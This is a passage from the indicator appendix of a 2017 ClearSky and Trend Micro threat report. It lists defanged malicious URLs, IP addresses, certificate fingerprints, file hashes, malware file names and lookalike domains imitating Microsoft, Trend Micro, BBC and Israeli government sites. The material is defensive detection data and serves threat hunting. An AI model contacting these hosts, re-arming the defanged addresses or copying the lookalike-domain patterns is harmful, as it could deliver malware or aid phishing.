http://update[.]microsoft-office[.]solutions/license[.]doc URL http://update[.]microsoft-office[.]solutions/error[.]html URL http://main[.]windowskernel14[.]com/spl/update5x[.]zip URL http://img[.]twiterstatics[.]info/i/658A6D6AE42A658A6D6AE42A/0de9c5c6599fdf5201599ff9b30e0000/6E24E58CF C94/icon[.]png URL http://files0[.]terendmicro[.]com/ URL http://ssl[.]pmo[.]gov[.]il-dana-naauthurl1-welcome[.]cgi[.]primeminister-govermenttechcenter[.]tech/%D7%A1%D7%A7%D7%A8%20%D7%A9%D7%A0%D7%AA%D7%99[.]docx URL http://ea-in-f155[.]1e100[.]microsoft-security[.]host/ URL https://ea-in-f155[.]1e100[.]microsoft-security[.]host/mTQJ URL http://iba[.]stage[.]7338879[.]i[.]gtld-servers[.]services URL http://doa[.]stage[.]7338879[.]i[.]gtld-servers[.]services URL http://fda[.]stage[.]7338879[.]i[.]gtld-servers[.]services URL http://rqa[.]stage[.]7338879[.]i[.]gtld-servers[.]services URL http://qqa[.]stage[.]7338879[.]i[.]gtld-servers[.]services URL http://api[.]02ac36110[.]49318[.]a[.]gtld-servers[.]zone URL s1w-amazonaws.office-msupdate[.]solutions URL a104-93-82-25.mandalasanati[.]info/iBpa URL http://fetchnews-agency[.]news-bbc.press/pictures.html URL http://fetchnews-agency.news-bbc.press/omnews.doc URL http://fetchnews-agency[.]news-bbc.press/en/20170/pictures.doc SSLCertificate fa3d5d670dc1d153b999c3aec7b1d815cc33c4dc SSLCertificate b11aa089879cd7d4503285fa8623ec237a317aee SSLCertificate 07317545c8d6fc9beedd3dd695ba79dd3818b941 SSLCertificate 3c0ecb46d65dd57c33df5f6547f8fffb3e15722d SSLCertificate 1c43ed17acc07680924f2ec476d281c8c5fd6b4a SSLCertificate 8968f439ef26f3fcded4387a67ea5f56ce24a003 IPv4Address 206.221.181.253 IPv4Address 66.55.152.164 IPv4Address 68.232.180.122 IPv4Address 173.244.173.11 IPv4Address 173.244.173.12 IPv4Address 173.244.173.13 IPv4Address 209.190.20.149 IPv4Address 209.190.20.59 IPv4Address 209.190.20.62 IPv4Address 209.51.199.116 IPv4Address 38.130.75.20 Page 39 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- IPv4Address 185.92.73.194 IPv4Address 144.168.45.126 IPv4Address 198.55.107.164 IPv4Address 104.200.128.126 IPv4Address 104.200.128.161 IPv4Address 104.200.128.173 IPv4Address 104.200.128.183 IPv4Address 104.200.128.184 IPv4Address 104.200.128.185 IPv4Address 104.200.128.187 IPv4Address 104.200.128.195 IPv4Address 104.200.128.196 IPv4Address 104.200.128.198 IPv4Address 104.200.128.205 IPv4Address 104.200.128.206 IPv4Address 104.200.128.208 IPv4Address 104.200.128.209 IPv4Address 104.200.128.48 IPv4Address 104.200.128.58 IPv4Address 104.200.128.64 IPv4Address 104.200.128.71 IPv4Address 107.181.160.138 IPv4Address 107.181.160.178 IPv4Address 107.181.160.194 IPv4Address 107.181.160.195 IPv4Address 107.181.161.141 IPv4Address 107.181.174.21 IPv4Address 107.181.174.228 IPv4Address 107.181.174.232 IPv4Address 107.181.174.241 IPv4Address 188.120.224.198 IPv4Address 188.120.228.172 IPv4Address 188.120.242.93 IPv4Address 188.120.243.11 IPv4Address 188.120.247.151 IPv4Address 62.109.2.52 IPv4Address 188.120.232.157 IPv4Address 185.118.65.230 IPv4Address 185.118.66.114 IPv4Address 141.105.67.58 IPv4Address 141.105.68.25 IPv4Address 141.105.68.26 IPv4Address 141.105.68.29 IPv4Address 141.105.69.69 IPv4Address 141.105.69.70 IPv4Address 141.105.69.77 IPv4Address 31.192.105.16 IPv4Address 31.192.105.17 IPv4Address 31.192.105.28 IPv4Address 146.0.73.109 IPv4Address 146.0.73.110 IPv4Address 146.0.73.111 IPv4Address 146.0.73.112 IPv4Address 146.0.73.114 Page 40 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- IPv4Address 217.12.201.240 IPv4Address 217.12.218.242 IPv4Address 5.34.180.252 IPv4Address 5.34.181.13 IPv4Address 86.105.18.5 IPv4Address 93.190.138.137 IPv4Address 212.199.61.51 IPv4Address 80.179.42.37 IPv4Address 80.179.42.44 IPv4Address 176.31.18.29 IPv4Address 188.165.69.39 IPv4Address 51.254.76.54 IPv4Address 158.69.150.163 IPv4Address 192.99.242.212 IPv4Address 198.50.214.62 Hash a60a32f21ac1a2ec33135a650aa8dc71 Hash 94ba33696cd6ffd6335948a752ec9c19 Hash bcae706c00e07936fc41ac47d671fc40 Hash 1ca03f92f71d5ecb5dbf71b14d48495c Hash 506415ef517b4b1f7679b3664ad399e1 Hash 1ca03f92f71d5ecb5dbf71b14d48495c Hash bd38cab32b3b8b64e5d5d3df36f7c55a Hash ac29659dc10b2811372c83675ff57d23 Hash 41466bbb49dd35f9aa3002e546da65eb Hash 8f6f7416cfdf8d500d6c3dcb33c4f4c9e1cd33998c957fea77fbd50471faec88 Hash 02f2c896287bc6a71275e8ebe311630557800081862a56a3c22c143f2f3142bd Hash 2df6fe9812796605d4696773c91ad84c4c315df7df9cf78bee5864822b1074c9 Hash 55f513d0d8e1fd41b1417a0eb2afff3a039a9529571196dd7882d1251ab1f9bc Hash da529e0b81625828d52cd70efba50794 Hash 1f9910cafe0e5f39887b2d5ab4df0d10 Hash 0feb0b50b99f0b303a5081ffb3c4446d Hash 577577d6df1833629bfd0d612e3dbb05 Hash 165f8db9c6e2ca79260b159b4618a496e1ed6730d800798d51d38f07b3653952 Hash 1f867be812087722010f12028beeaf376043e5d7 Hash b571c8e0e3768a12794eaf0ce24e6697 Hash e319f3fb40957a5ff13695306dd9de25 Hash acf24620e544f79e55fd8ae6022e040257b60b33cf474c37f2877c39fbf2308a Hash 8c8496390c3ad048f2a0a4031edfcdac819ee840d32951b9a1a9337a2dcbea25 Hash c5a02e984ca3d5ac13cf946d2ba68364 Hash efca6664ad6d29d2df5aaecf99024892 Hash bff115d5fb4fd8a395d158fb18175d1d183c8869d54624c706ee48a1180b2361 Hash afa563221aac89f96c383f9f9f4ef81d82c69419f124a80b7f4a8c437d83ce77 Hash 4a3d93c0a74aaabeb801593741587a02 Hash 64c9acc611ef47486ea756aca8e1b3b7 Hash fb775e900872e01f65e606b722719594 Hash cf8502b8b67d11fbb0c75ebcf741db15 Hash 4999967c94a2fb1fa8122f1eea7a0e02 Hash 5fe0e156a308b48fb2f9577ed3e3b09768976fdd99f6b2d2db5658b138676902 Hash 37449ddfc120c08e0c0d41561db79e8cbbb97238 Hash 4442c48dd314a04ba4df046dfe43c9ea1d229ef8814e4d3195afa9624682d763 Hash 7651f0d886e1c1054eb716352468ec6aedab06ed61e1eebd02bca4efbb974fb6 Hash eb01202563dc0a1a3b39852ccda012acfe0b6f4d Hash 7e3c9323be2898d92666df33eb6e73a46c28e8e34630a2bd1db96aeb39586aeb Hash 9e5ab438deb327e26266c27891b3573c302113b8d239abc7f9aaa7eff9c4f7bb Page 41 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- Hash 6a19624d80a54c4931490562b94775b74724f200 Hash 32860b0184676509241bbaf9233068d472472c3d9c93570fc072e1acea97a1d4 Hash b34721e53599286a1093c90a9dd0b789 Hash 7ad65e39b79ad56c02a90dfab8090392ec5ffed10a8e276b86ec9b1f2524ad31 Hash 59c448abaa6cd20ce7af33d6c0ae27e4a853d2bd Hash fb775e900872e01f65e606b722719594 Hash 871efc9ecd8a446a7aa06351604a9bf4 Hash cf8502b8b67d11fbb0c75ebcf741db15 Hash a4dd1c225292014e65edb83f2684f2d5 Hash 838fb8d181d52e9b9d212b49f4350739 Hash e37418ba399a095066845e7829267efe Hash 1072b82f53fdd9fa944685c7e498eece89b6b4240073f654495ac76e303e65c9 Hash 752240cddda5acb5e8d026cef82e2b54 Hash 435a93978fa50f55a64c788002da58a5 Hash 3de91d07ac762b193d5b67dd5138381a Hash a4adbea4fcbb242f7eac48ddbf13c814d5eec9220f7dce01b2cc8b56a806cd37 Hash aba7771c42aea8048e4067809c786b0105e9dfaa Hash b01e955a34da8698fae11bf17e3f79a054449f938257284155aeca9a2d3815dd Hash 3676914af9fd575deb9901a8b625f032 Hash f1607a5b918345f89e3c2887c6dafc05c5832593 Hash 341c920ec47efa4fd1bfcd1859a7fb98945f9d85 Hash 8b702ba2b2bd65c3ad47117515f0669c Hash 6ea02f1f13cc39d953e5a3ebcdcfd882 Hash 8f77a9cc2ad32af6fb1865fdff82ad89 Hash 62f8f45c5f10647af0040f965a3ea96d Hash d9aa197ca2f01a66df248c7a8b582c40 Hash 217b1c2760bcf4838f5e3efb980064d7 Hash cfb4be91d8546203ae602c0284126408 Hash 16a711a8fa5a40ee787e41c2c65faf9a78b195307ac069c5e13ba18bce243d01 Hash 5e65373a7c6abca7e3f75ce74c6e8143 Hash d3b9da7c8c54f7f1ea6433ac34b120a1 Hash 32261fe44c368724593fbf65d47fc826 Hash d2c117d18cb05140373713859803a0d6 Hash 113ca319e85778b62145019359380a08 Hash 4999967c94a2fb1fa8122f1eea7a0e02 Hash 9846b07bf7265161573392d24543940e Hash bf23ce4ae7d5c774b1fa6becd6864b3b Hash 720203904c9eaf45ff767425a8c518cd Hash 62652f074924bb961d74099bc7b95731 Hash 1fba1876c88203a2ae6a59ce0b5da2a1 Hash cf8502b8b67d11fbb0c75ebcf741db15 Hash fb775e900872e01f65e606b722719594 Hash 73f14f320facbdd29ae6f0628fa6f198dc86ba3428b3eddbfc39cf36224cebb9 Hash 3d2885edf1f70ce4eb1e9519f47a669f Filename config.exe Filename Strike.doc Filename malware.doc Filename PDFOPENER_CONSOLE.exe Filename Ma_1.tmp Filename Wextract Filename The%20United%20Nations%20Counter.doc.docx Filename netsrvs.exe Filename Date.dotm Filename ssl.docx Page 42 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- Filename o040t.exe Filename m8f7s.exe Filename d5tjo.exe Filename _LogManager.tmp_ Filename _edg1CF5.tmp_ Filename _ntuser.swp_ Filename _svchost64.swp_ Filename _ntuser.dat.swp_ Filename _455aa96e-804g-4bcf-bcf8-f400b3a9cfe9.PackageExtraction_ Filename _Svchost32.swp_ Filename _Svchost64.swp_ Filename update5x.dll Filename 22092014_ver621.dll Filename _netsrv.exe_ Filename _netsrva.exe_ Filename _netsrvd.exe_ Filename _netsrvs.exe_ Filename _vminst.tmp_ Filename _tdtess.exe_ Filename test_oracle.xls Filename ur96r.exe Filename The North Korean weapons program now testing USA range.docx Filename F123321.exe Domain wethearservice[.]com Domain mywindows24[.]in Domain microsoft-office[.]solutions Domain code[.]jguery[.]net Domain 1m100[.]tech Domain cloudflare-statics[.]com Domain cachevideo[.]com Domain winfeedback[.]net Domain terendmicro[.]com Domain alkamaihd[.]com Domain msv-updates[.]gsvr-static[.]co Domain fbstatic-a[.]space Domain broadcast-microsoft[.]tech Domain sharepoint-microsoft[.]co Domain newsfeeds-microsoft[.]press Domain owa-microsoft[.]online Domain digicert[.]online Domain cloudflare-analyse[.]com Domain israelnewsagency[.]link Domain akamaitechnology[.]tech Domain winupdate64[.]org Domain ads-youtube[.]net Domain cortana-search[.]com Domain nsserver[.]host Domain nameserver[.]win Domain symcd[.]xyz Domain fdgdsg[.]xyz Domain dnsserv[.]host Domain winupdate64[.]com Domain ssl-gstatic[.]online Domain updatedrivers[.]org Page 43 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- Domain alkamaihd[.]net Domain update[.]microsoft-office[.]solutions Domain javaupdate[.]co Domain outlook360[.]org Domain winupdate64[.]net Domain trendmicro[.]tech Domain qoldenlines[.]net Domain windefender[.]org Domain 1e100[.]tech Domain chromeupdates[.]online Domain ads-youtube[.]online Domain akamaitechnology[.]com Domain cloudmicrosoft[.]net Domain js[.]jguery[.]online Domain azurewebsites[.]tech Domain elasticbeanstalk[.]tech Domain jguery[.]online Domain microsoft-security[.]host Domain microsoft-ds[.]com Domain jguery[.]net Domain primeminister-goverment-techcenter[.]tech Domain officeapps-live[.]com Domain microsoft-tool[.]com Domain cissco[.]net Domain js[.]jguery[.]net Domain f-tqn[.]com Domain javaupdator[.]com Domain officeapps-live[.]net Domain ipresolver[.]org Domain intelchip[.]org Domain outlook360[.]net Domain windowkernel[.]com Domain wheatherserviceapi[.]info Domain windowslayer[.]in Domain sdlc-esd-oracle[.]online Domain mpmicrosoft[.]com Domain officeapps-live[.]org Domain cachevideo[.]online Domain win-update[.]com Domain labs-cloudfront[.]com Domain windowskernel14[.]com Domain fbstatic-akamaihd[.]com Domain mcafee-analyzer[.]com Domain cloud-analyzer[.]com Domain fb-statics[.]com Domain ynet[.]link Domain twiter-statics[.]info Domain diagnose[.]microsoft-office[.]solutions Domain mswordupdate17[.]com Domain gsvr-static[.]co Domain news-bbc[.]press Domain mandalasanati[.]info Domain office-msupdate[.]solutions Domain windows-updates[.]solutions Page 44 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- Domain akamai-net[.]network Domain azureedge-net[.]services Domain doucbleclick[.]tech Domain windows-updates[.]services Domain windows-updates[.]network Domain cloudfront[.]site Domain netcdn-cachefly[.]network Domain akamaized[.]online Domain cdninstagram[.]center Domain googlusercontent[.]center DNSName ea-in-f354[.]1e100[.]ads-youtube[.]net DNSName ns1[.]ynet[.]link DNSName ns2[.]ynet[.]link DNSName static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]be-5-0-ibr01-lts-ntwk-msn[.]alkamaihd[.]com DNSName pht[.]is[.]nlb-deploy[.]edge-dyn[.]e11[.]f20[.]ads-youtube[.]online DNSName ns1[.]winfeedback[.]net DNSName ns2[.]winfeedback[.]net DNSName msupdate[.]diagnose[.]microsoft-office[.]solutions DNSName www[.]alkamaihd[.]net DNSName c20[.]jdk[.]cdn-external-ie[.]1e100[.]alkamaihd[.]net DNSName ns2[.]img[.]twiter-statics[.]info DNSName api[.]img[.]twiter-statics[.]info DNSName ns1[.]img[.]twiter-statics[.]info DNSName ns1[.]officeapps-live[.]net DNSName ns1[.]wheatherserviceapi[.]info DNSName ns2[.]microsoft-tool[.]com DNSName ns2[.]f-tqn[.]com DNSName carl[.]ns[.]cloudflare[.]com[.]sdlc-esd-oracle[.]online DNSName ns1[.]cortana-search[.]com DNSName 40[.]dc[.]c0ad[.]ip4[.]dyn[.]gsvr-static[.]co DNSName 40[.]dc[.]c2ad[.]ip4[.]dyn[.]gsvr-static[.]co DNSName ns2[.]winupdate64[.]org DNSName ns1[.]f-tqn[.]com DNSName ns2[.]cortana-search[.]com DNSName ns1[.]symcd[.]xyz DNSName ns2[.]symcd[.]xyz DNSName ns1[.]winupdate64[.]org DNSName ns1[.]microsoft-tool[.]com DNSName ns2[.]officeapps-live[.]com DNSName ns1[.]israelnewsagency[.]link DNSName ns2[.]israelnewsagency[.]link DNSName ns1[.]cissco[.]net DNSName ns2[.]cissco[.]net DNSName ns1[.]cachevideo[.]online DNSName ns2[.]cachevideo[.]online DNSName www[.]static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]alkamaihd[.]com DNSName static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]www[.]alkamaihd[.]com DNSName dhb[.]stage[.]12735072[.]40[.]dc[.]c0ad[.]ip4[.]sta[.]gsvr-static[.]co DNSName main[.]windowskernel14[.]com DNSName www[.]winupdate64[.]net DNSName ae13-0-hk2-96cbe-1a-ntwk-msn[.]static[.]dyn-usr[.]g-blcse[.]d45[.]a63[.]akamai[.]alkamaihd[.]com DNSName be-5-0-ibr01-lts-ntwk-msn[.]static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]alkamaihd[.]com Page 45 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- DNSName static[.]dyn usr[.]g blc se[.]d45[.]a63[.]akamai[.]static[.]dyn usr[.]g blc se[.]d45[.]a63[.]akamai[.]alkamaihd[.]com DNSName cyb[.]stage[.]12735072[.]40[.]dc[.]c0ad[.]ip4[.]sta[.]gsvr-static[.]co DNSName ns1[.]winupdate64[.]com DNSName ns1[.]twiter-statics[.]info DNSName 40[.]dc[.]c0ad[.]ip4[.]dyn[.]gsvr-static[.]co DNSName update[.]microsoft-office[.]solutions DNSName wk-in-f104[.]1e100[.]n[.]microsoft[.]qoldenlines[.]net DNSName ns1[.]fb-statics[.]com DNSName ns2[.]fb-statics[.]com DNSName is-cdn[.]edge[.]g18[.]dyn[.]usr-e12-as[.]akamaitechnology DNSName img[.]gmailtagmanager[.]com DNSName wk-in-f104[.]1c100[.]n[.]microsoft-security[.]host DNSName msnbot-sd7-46-cdn[.]microsoft-security[.]host DNSName msnbot-sd7-46-img[.]microsoft-security[.]host DNSName ns2[.]winupdate64[.]com DNSName msnbot-sd7-46-194[.]microsoft-security[.]host DNSName ea-in-f155[.]1e100[.]microsoft-security[.]host DNSName msnbot-207-46-194[.]microsoft-security[.]host DNSName img[.]twiter-statics[.]info DNSName msnbot-sd7-46-cdn[.]microsoft-security[.]host DNSName ns2[.]wheatherserviceapi[.]info DNSName ns1[.]windowkernel[.]com DNSName ns2[.]windowkernel[.]com DNSName ns2[.]fbstatic-a[.]space DNSName ns1[.]fbstatic-a[.]space DNSName api[.]TwitEr-Statics[.]info DNSName ns2[.]mcafee-analyzer[.]com DNSName 21666[.]mpmicrosoft[.]com DNSName 22830[.]officeapps-live[.]org DNSName 15236[.]mcafee-analyzer[.]com DNSName ns2[.]static[.]dyn-usr[.]gsrv02[.]ssl-gstatic[.]online DNSName ns1[.]mcafee-analyzer[.]com DNSName ns1[.]fbstatic-akamaihd[.]com DNSName ns1[.]static[.]dyn-usr[.]gsrv01[.]ssl-gstatic[.]online DNSName ns2[.]officeapps-live[.]org DNSName wk-in-f104[.]1e100[.]n[.]microsoft-security[.]host DNSName ns1[.]mpmicrosoft[.]com DNSName www[.]microsoft-security[.]host DNSName ns2[.]fbstatic-akamaihd[.]com DNSName ns1[.]cachevideo[.]online DNSName wk-in-f100[.]1e100[.]n[.]microsoft-security[.]host DNSName ns1[.]officeapps-live[.]org DNSName ns2[.]mpmicrosoft[.]com DNSName ns02[.]nsserver[.]host DNSName ns2[.]cachevideo[.]online DNSName be-5-0-ibr01-lts-ntwk-msn[.]alkamaihd[.]com DNSName static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]akamai[.]alkamaihd[.]com DNSName www[.]alkamaihd[.]com DNSName ae13-0-hk2-96cbe-1a-ntwk-msn[.]alkamaihd[.]com DNSName ns2[.]microsoft-ds[.]com DNSName adcenter[.]microsoft-ds[.]com DNSName ns1[.]microsoft-ds[.]com DNSName ns1[.]mswordupdate17[.]com Page 46 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- DNSName ns2[.]mswordupdate17[.]com DNSName c[.]mswordupdate17[.]com DNSName ns1[.]cloudflare-analyse[.]com DNSName static[.]dyn-usr[.]f-loginme[.]c19[.]a23[.]akamaitechnology[.]com DNSName ns2[.]cloudflare-analyse[.]com DNSName ns1[.]cloud-analyzer[.]com DNSName ns2[.]cloud-analyzer[.]com DNSName ns01[.]nsserver[.]host DNSName ns1[.]fb-statics[.]com DNSName ns02[.]dnsserv[.]host DNSName 15236[.]cachevideo[.]online DNSName ns2[.]fb-statics[.]com DNSName ns2[.]twiter-statics[.]info DNSName ea-in-f113[.]1e100[.]microsoft-security[.]host DNSName static[.]dyn-usr[.]f-login-me[.]c19[.]a[.]akamaitechnology[.]tech DNSName ea-in-f155[.]1e100[.]microsoft-security[.]host DNSName float[.]2963[.]bm-imp[.]akamaitechnology[.]tech DNSName ns1[.]mcafee-analyzer[.]com DNSName ns2[.]mcafee-analyzer[.]com DNSName ns1[.]mpmicrosoft[.]com DNSName ns2[.]mpmicrosoft[.]com DNSName jpsrv-java-jdkec1[.]javaupdate[.]co DNSName microsoft-active[.]directory_update-change-policy[.]primeminister-goverment-techcenter[.]tech DNSName jpsrv-java-jdkec3[.]javaupdate[.]co DNSName nameserver02[.]javaupdate[.]co DNSName jpsrv-java-jdkec2[.]javaupdate[.]co DNSName static[.]dyn-usr[.]f-login-me[.]c19[.]a23[.]akamaitechnology[.]com DNSName static[.]dyn-usr[.]g-blc-se[.]d45[.]a63[.]alkamaihd[.]net DNSName ssl[.]pmo[.]gov[.]il-dana-naauthurl1-welcome[.]cgi[.]primeminister-goverment-techcenter[.]tech DNSName ns1[.]static[.]dyn-usr[.]gsrv01[.]ssl- gstatic[.]online DNSName ns2[.]static[.]dyn-usr[.]gsrv02[.]ssl- gstatic[.]online DNSName static[.]primeminister-goverment-techcenter[.]tech DNSName ns1[.]outlook360[.]org DNSName d45[.]a63[.]alkamaihd[.]net DNSName ns1[.]officeapps-live[.]org DNSName ns2[.]outlook360[.]org DNSName ns2[.]officeapps-live[.]org DNSName ns2[.]win-update[.]com DNSName aaa[.]stage[.]14043411[.]email[.]sharepoint-microsoft[.]co DNSName ns1[.]updatedrivers[.]org DNSName a17-h16[.]g11[.]iad17[.]as[.]pht-external[.]c15[.]qoldenlines[.]net DNSName ns1[.]windefender[.]org DNSName is-cdn[.]edge[.]g18[.]dyn[.]usr-e12-as[.]akamaitechnology[.]com DNSName ns2[.]windefender[.]org DNSName ns1[.]win-update[.]com DNSName ns2[.]updatedrivers[.]org DNSName ns1[.]mpmicrosoft[.]com DNSName ns1[.]officeapps-live[.]org DNSName ns2[.]officeapps-live[.]org DNSName ns2[.]ipresolver[.]org DNSName ns1[.]ipresolver[.]org DNSName www[.]is-cdn[.]edge[.]g18[.]dyn[.]usr-e12-as[.]akamaitechnology[.]com DNSName 11716[.]cachevideo[.]com DNSName ns1[.]intelchip[.]org Page 47 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- DNSName ns2[.]cachevideo[.]com DNSName 7737[.]cloudflare-statics[.]com DNSName 7052[.]cloudflare-statics[.]com DNSName 7737[.]digicert[.]online DNSName ns1[.]cloudflare-statics[.]com DNSName 24984[.]cachevideo[.]com DNSName ns1[.]digicert[.]online DNSName ns2[.]digicert[.]online DNSName 24984[.]digicert[.]online DNSName ns1[.]fbstatic-akamaihd[.]com DNSName ns2[.]fbstatic-akamaihd[.]com DNSName ns1[.]javaupdator[.]com DNSName ns2[.]outlook360[.]net DNSName ns01[.]nameserver[.]win DNSName ns2[.]javaupdator[.]com DNSName ns2[.]intelchip[.]org DNSName TATIC[.]DYN-USR[.]GSRV01[.]SSL-GSTATIC[.]ONLINe DNSName STATIC[.]DYN-USR[.]GSRV01[.]SSL-GSTATIC[.]online DNSName ns1[.]labs-cloudfront[.]com DNSName ns2[.]labs-cloudfront[.]com DNSName www[.]broadcast-microsoft[.]tech DNSName www[.]newsfeeds-microsoft[.]press DNSName www[.]owa-microsoft[.]online DNSName static[.]c20[.]jdk[.]cdn-external-ie[.]1e100[.]tech DNSName ns1[.]cloud-analyzer[.]com DNSName ns2[.]cloud-analyzer[.]com DNSName ns2[.]cloudflare-statics[.]com DNSName ns1[.]cachevideo[.]com DNSName ns1[.]outlook360[.]net DNSName 3012[.]digicert[.]online DNSName 24984[.]cloudflare-statics[.]com DNSName 7737[.]cachevideo[.]com DNSName hda[.]stage[.]12735072[.]40[.]dc[.]c0ad[.]ip4[.]sta[.]gsvr-static[.]co DNSName msdn[.]winupdate64[.]net DNSName kja[.]stage[.]12735072[.]40[.]dc[.]c0ad[.]ip4[.]sta[.]gsvr-static[.]co Page 48 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 -----